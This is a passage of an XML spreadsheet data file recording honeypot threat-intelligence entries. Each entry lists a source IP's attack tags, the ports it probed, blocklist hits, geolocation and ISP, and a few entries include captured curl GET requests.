    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H30&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;45752&amp;&amp;23&amp;&amp;80&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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7f:4fc4"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3007"/>
    <x v="3007"/>
    <s v="NA&amp;&amp;125-228-107-6.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-05T13:00:59"/>
    <d v="2024-12-25T17:51:51"/>
    <d v="2025-04-05T13:00:59"/>
    <n v="223"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="23&amp;&amp;NA&amp;&amp;80"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:6b06"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3008"/>
    <x v="3008"/>
    <s v="NA&amp;&amp;1-34-51-65.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-05T13:00:58"/>
    <d v="2024-12-21T18:46:18"/>
    <d v="2025-04-05T13:00:58"/>
    <n v="212"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H23"/>
    <s v="23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100"/>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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:122:3341"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3009"/>
    <x v="3009"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T12:57:03"/>
    <d v="2025-01-20T12:29:59"/>
    <d v="2025-04-05T12:57:03"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H33"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Konkan Division"/>
    <s v="Mumbai (Ghodapdeo)"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="18.9861"/>
    <s v="72.8371"/>
    <s v="45820"/>
    <s v="TTSL-ISP DIVISION"/>
    <s v="Ttsl-isp Division"/>
    <s v="business"/>
    <s v="Tata Teleservices Limited- North India"/>
    <s v="2009-06-26"/>
    <s v="TTSLISP"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (111.93.62.188,1217)}&amp;&amp;{Data_SMB:Incoming connection (111.93.62.188,4318)}&amp;&amp;{Data_SMB:Incoming connection (111.93.62.188,4279)}&amp;&amp;{Data_SMB:Incoming connection (111.93.62.188,3928)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6f5d:3ebc"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3010"/>
    <x v="3010"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T12:46:10"/>
    <d v="2025-04-05T12:46:10"/>
    <d v="2025-04-05T12:46:10"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:3914"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3011"/>
    <x v="3011"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T12:23:13"/>
    <d v="2025-04-05T12:23:13"/>
    <d v="2025-04-05T12:23:13"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore (Jurong East)"/>
    <s v="1880252"/>
    <s v="609606"/>
    <s v="1.32525"/>
    <s v="103.749"/>
    <s v="4773"/>
    <s v="MOBILEONELTD-AS-AP"/>
    <s v="M1 Limited"/>
    <s v="corporate"/>
    <s v="M1 Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:af9c:e24f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3012"/>
    <x v="3012"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T12:19:45"/>
    <d v="2024-04-11T08:48:00"/>
    <d v="2025-04-05T12:19:45"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="52303&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2010-08-02"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e2b:8d99"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3013"/>
    <x v="3013"/>
    <s v="1-160-199-51.dynamic-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T12:16:45"/>
    <d v="2025-04-05T12:08:58"/>
    <d v="2025-04-05T12:16:45"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0531"/>
    <s v="121.526"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2010-05-05"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1a0:c733"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3014"/>
    <x v="3014"/>
    <s v="NA&amp;&amp;syn-066-168-134-212.res.spectrum.com"/>
    <x v="0"/>
    <d v="2025-04-05T12:16:07"/>
    <d v="2025-03-25T01:01:13"/>
    <d v="2025-04-05T12:16:07"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NE"/>
    <s v="Nebraska"/>
    <s v="Scotts Bluff"/>
    <s v="Scottsbluff"/>
    <s v="5699404"/>
    <s v="69361"/>
    <s v="41.8666"/>
    <s v="-103.667"/>
    <s v="20115"/>
    <s v="Charter Communications"/>
    <s v="Charter Communications"/>
    <s v="business"/>
    <s v="Spectrum"/>
    <s v="2001-09-12"/>
    <s v="CHARTER-NET-4BLK"/>
    <s v="2012-03-02"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:42a8:86d4"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3015"/>
    <x v="3015"/>
    <s v="NA&amp;&amp;220-133-204-17.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-05T12:03:04"/>
    <d v="2025-04-05T07:00:51"/>
    <d v="2025-04-05T12:03:04"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="high"/>
    <s v="abuseipdb&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="NA&amp;&amp;23&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="None"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="NA&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:cc11"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3016"/>
    <x v="3016"/>
    <s v="NA&amp;&amp;59-127-234-125.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-05T12:01:22"/>
    <d v="2024-12-18T08:04:21"/>
    <d v="2025-04-05T12:01:22"/>
    <n v="289"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="None"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7f:ea7d"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3017"/>
    <x v="3017"/>
    <s v="220-133-167-224.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T12:00:54"/>
    <d v="2024-12-27T22:02:17"/>
    <d v="2025-04-05T12:00:54"/>
    <n v="412"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="23&amp;&amp;NA&amp;&amp;80&amp;&amp;9100"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:a7e0"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3018"/>
    <x v="3018"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T11:48:38"/>
    <d v="2025-04-05T09:56:18"/>
    <d v="2025-04-05T11:48:38"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:a8c3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3019"/>
    <x v="3019"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T11:39:22"/>
    <d v="2025-04-05T11:39:22"/>
    <d v="2025-04-05T11:39:22"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="107"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="27"/>
    <s v="Daegu"/>
    <s v="NA"/>
    <s v="Daegu (Dongin 2(i)-ga)"/>
    <s v="1835329"/>
    <s v="NA"/>
    <s v="35.8683"/>
    <s v="128.606"/>
    <s v="4766"/>
    <s v="KIXS-AS-KR"/>
    <s v="Korea Telecom"/>
    <s v="corporate"/>
    <s v="hangugtongsindaegubonbu"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc5e:5a46"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3020"/>
    <x v="3020"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T11:29:31"/>
    <d v="2025-04-05T11:29:31"/>
    <d v="2025-04-05T11:29:31"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:909b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3021"/>
    <x v="3021"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T10:29:11"/>
    <d v="2025-04-05T10:29:11"/>
    <d v="2025-04-05T10:29:11"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
